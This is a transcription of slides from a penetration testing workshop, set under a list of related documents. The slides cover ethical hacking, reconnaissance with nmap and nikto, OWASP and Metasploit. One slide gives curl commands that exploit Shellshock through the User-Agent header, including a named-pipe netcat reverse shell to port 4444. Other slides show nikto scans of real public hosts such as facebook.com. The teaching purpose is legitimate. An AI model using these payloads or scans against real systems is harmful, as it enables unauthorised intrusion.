Penetration Testing Workshop

Similar documents
Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security Sans Mentor: Daryl Fallin

1 Scope of Assessment

Penetration Testing. NTS330 Unit 1 Penetration V1.0. February 20, Juan Ortega. Juan Ortega, juaorteg@uat.edu. 1 Juan Ortega, juaorteg@uat.

INTRODUCTION: PENETRATION TEST A BUSINESS PERSPECTIVE:

CIT 380: Securing Computer Systems

IDS and Penetration Testing Lab ISA 674

Aiming at Higher Network Security Levels Through Extensive PENETRATION TESTING. Anestis Bechtsoudis. abechtsoudis (at) ieee.

Introduction to Network Security Lab 2 - NMap

Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology

Penetration Testing with Kali Linux

ITEC441- IS Security. Chapter 15 Performing a Penetration Test

Vulnerability Assessment and Penetration Testing. CC Faculty ALTTC, Ghaziabad

Attacks and Defense. Phase 1: Reconnaissance

FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. Chapter 4 Finding Network Vulnerabilities

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Vulnerability Assessment and Penetration Testing

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST

Penetration Testing Report Client: Business Solutions June 15 th 2015

CRYPTUS DIPLOMA IN IT SECURITY

COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM

Penetration Testing. Types Black Box. Methods Automated Manual Hybrid. oless productive, more difficult White Box

Learn Ethical Hacking, Become a Pentester

PTSv2 in pills: The Best First for Beginners who want to become Penetration Testers. Self-paced, online, flexible access

Introduction to Laboratory Assignment 3 Vulnerability scanning with OpenVAS

Black Box Penetration Testing For GPEN.KM V1.0 Month dd "#$!%&'(#)*)&'+!,!-./0!.-12!1.03!0045!.567!5895!.467!:;83!-/;0!383;!

NETWORK SECURITY WITH OPENSOURCE FIREWALL

Client logo placeholder XXX REPORT. Page 1 of 37

Lab 10: Security Testing Linux Server

A Network Administrator s Guide to Web App Security

Open Source Security Tool Overview

Newsletter - September T o o l s W a t c h T e a m NJ OUCHN & MJ SOLER

Penetration Testing. What Is a Penetration Testing?

WEB APPLICATION HACKING. Part 2: Tools of the Trade (and how to use them)

NETWORK PENETRATION TESTS FOR EHR MANAGEMENT SOLUTIONS PROVIDER

Certified Ethical Hacker (CEH)

Andreas Dittrich, Philipp Reinecke Testing of Network and System Security. example.

Divide and Conquer Real World Distributed Port Scanning

Metasploit The Elixir of Network Security

60467 Project 1. Net Vulnerabilities scans and attacks. Chun Li

CYBERTRON NETWORK SOLUTIONS

Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap.

Automated Penetration Testing with the Metasploit Framework. NEO Information Security Forum March 19, 2008

Security Considerations White Paper for Cisco Smart Storage 1

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

Shellshock. Oz Elisyan & Maxim Zavodchik

Introduction to Penetration Testing Graham Weston

Penetration Testing Ninjitsu 2: Crouching Netcat, Hidden Vulnerabilities. By Ed Skoudis

Virtual Learning Tools in Cyber Security Education

Remote Network Analysis

SETTING UP AND USING A CYBER SECURITY LAB FOR EDUCATION PURPOSES *

ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details

SAST, DAST and Vulnerability Assessments, = 4

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

Attack Frameworks and Tools

Penetration Testing. Security Testing

Course Title: Penetration Testing: Security Analysis

How to hack a website with Metasploit

IDS and Penetration Testing Lab ISA656 (Attacker)

Computer Forensics Training - Digital Forensics and Electronic Discovery (Mile2)

Course Duration: 80Hrs. Course Fee: INR (Certification Lab Exam Cost 2 Attempts)

!!!!!!!!!!!!!!!!!!!!!!


Dynamic Honeypot Construction

EXTRA. Vulnerability scanners are indispensable both VULNERABILITY SCANNER

IDS and Penetration Testing Lab II

REPORT ON AUDIT OF LOCAL AREA NETWORK OF C-STAR LAB

SECURITY TOOLS SOFTWARE IN AN OPEN SOURCE ENVIRONMENT. Napoleon Alexandru SIRETEANU *

LEARNING COMPUTER SYSTEMS VULNERABILITIES EXPLOITATION THROUGH PENETRATION TEST EXPERIMENTS

Vulnerability analysis

Nmap: Scanning the Internet

Ethical Hacking as a Professional Penetration Testing Technique

Security+ Guide to Network Security Fundamentals, Third Edition Chapter 9 Performing Vulnerability Assessments

An Introduction to Nmap with a Focus on Information Gathering. Ionuț Ambrosie

8 steps to protect your Cisco router

Experiences with Honey-Patching in Active Cyber Security Education

Recon and Mapping Tools and Exploitation Tools in SamuraiWTF Report section Nick Robbins

Passive Vulnerability Detection

Build Your Own Security Lab

Vulnerability Scanning & Management

June 2014 WMLUG Meeting Kali Linux

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Conducting a Penetration Test/Vulnerability Analysis to Improve an Organization s Information Security Posture

How To Set Up A Network Map In Linux On A Ubuntu 2.5 (Amd64) On A Raspberry Mobi) On An Ubuntu (Amd66) On Ubuntu 4.5 On A Windows Box

INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION

Using Nessus In Web Application Vulnerability Assessments

National Cyber League Certified Ethical Hacker (CEH) TM Syllabus

Network Security In Linux: Scanning and Hacking

Profiling Campus Network using Network Penetration Testing

CSSIA CompTIA Security+ Domain. Network Security. Network Security. Network Security. Network Security. Network Security

Lab Objectives & Turn In

A Study on the Security aspects of Network System Using Penetration Testing

Description of Actual State Sensor Types for the Software Asset Management (SWAM) Capability. 7 Jul 2014

Detection of illegal gateways in protected networks

Transcription:

Penetration Testing Workshop

Who are we? Carter Poe Nathan Ritchey Mahdi Shapouri Fred Araujo

Outline Ethical hacking What is penetration testing? Planning Reconnaissance Footprinting Network Endpoint Application Attack Vulnerability probing Metasploit Hands-on Lab Network reconnaissance & OS Fingerprinting From SQL injection to shell

Ethical Hacking What is it? How to do it safely.

Ethical Hacking In any computer security attack, the attacker will fall into any three categories depending on their intentions and use of the attack. Black Hat Hackers are attackers whose sole reason for penetrating a system is to gain information from the system to be used for malicious purposes. Its important to note that you are breaking SEVERAL federal and state laws while performing this category of attack. If caught the punishment typically ranges from confiscation of equipment to jail time.

Ethical Hacking White Hat Hackers are attackers whose sole reason for penetrating a system is to harden the system against attacks so that it will be less susceptible to attacks in the future. Companies typically hire these hackers to stress test their defense systems for any potential holes within the defense network. While this kind of attack is legal, the attackers are only allowed to access areas that the company explicitly consents to. This is the kind of hacking we will be doing today.

Ethical Hacking Gray Hat Hackers are attackers whose sole reason for penetrating a system is simply because they can and they typically return any stolen information that could be used for malicious purposes. While these attacks are considered illegal, the majority of attackers are never caught or even noticed after the attack has happened.

Ethical Hacking Today we are going to show you how to go about hacking in a safe environment, a set of tools to use for hacking, and some business applications of white hat hacking.

What is Penetration Testing Penetration testing can be defined as a security oriented probing of a computer system or network to seek out vulnerabilities that an attacker could exploit

Business Perspective of Pen Testing Why would I ever need a penetration test? A successful penetration test would be that which would help an organization to understand the business risks arising from the vulnerabilities, and would provide a proper risk mitigation plan that fits the organizations business policy.

Pen Testing Model Planning Discovery Attack Reporting

Planning Where the scope for the assignment is defined. Limitations compared to hackers. Time Legal Restrictions

Discovery Footprinting Network Endpoint Application

Discovery: Footprinting First part of Discovery. Involves searching the internet, querying various public repositories (whois databases, domain registrars, Usenet groups, mailing lists, etc.).

Discovery: Network Mapping out the Topology of a network. High level representation with Etherape.

Discovery: Network (Cont.) Using Nmap Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich) used to discover hosts and services on a computer network, thus creating a "map" of the network.

Discovery: Network (Cont.) Nmap Output

Discovery: Endpoint OS Fingerprinting Determining the type of operating system used by studying the types of packets flowing from a system. Passive OS fingerprinting only analyzes the packets. Active OS fingerprinting sends challenges to the OS and examines the type of responses.

Discovery: Endpoint OS Fingerprinting with Xprobe2

Discovery: Applications

OWASP Top 10

Discovery: Applications Application & services discovery Manual (e.g., telnet) Automated (e.g., nikto, nessus, openvas) Vulnerability probing owasp-zap Burpsuite Nikto

nikto host 74.217.87.87 port 80

nikto host 8.26.65.101 port 80

nikto host facebook.com port 80

Vulnerability probing with owasp-zap

How to find proof-of-concept exploits?

How to find proof-of-concept exploits?

CVE-2014-6271 exploit

Metasploit What is Metasploit? A computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.

Port Scanning results Show:

Services Running PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.17 ((Unix)) 1064/tcp open tcp wrapped There is a web server running

Web Server Vulnerability Analysis Tool NIKTO:

What is Shellshock? (AKA Bashdoor) It is a security bug in the widely used Unix Bash shell (Unix shell and commandline language). Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system Disclosed on 24 September 2014 by Stéphane Chazelas

In this scenario:

Shellshock ( Commandline ) curl -A "() { :; }; echo Content-Type: text/plain ; echo ; /bin/ls /tmp/" http://10.176.68.191/cgi-bin/login.cgi NetCat: curl -A "() { :; }; echo Content-Type: text/plain ; echo ; /bin/nc $curl -A "() { :; }; echo Content-Type: text/plain ; echo ; echo ; /bin/mknod /tmp/p p" http://<target-ip>/cgi-bin/login.cgi $curl -A "() { :; }; echo Content-Type: text/plain ; echo ; echo ; /bin/dash 0</tmp/p /bin/nc <your-ip> 4444 1>/tmp/p" http://<target-ip>/cgibin/login.cgi You can also get netcat output everything into a txt file. nc -l 60000 > qux.txt ;

Basic concept: How to Use Metasploit Run msfconsole (MetaSploit Framework) Identify a remote host Pick a vulnerability and use an exploit Configure the exploit Execute the payload against the remote host

Join us at Metasploit Freaks

QUESTIONS?

Please give us your feedback! http://goo.gl/forms/azxk8lih7l

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information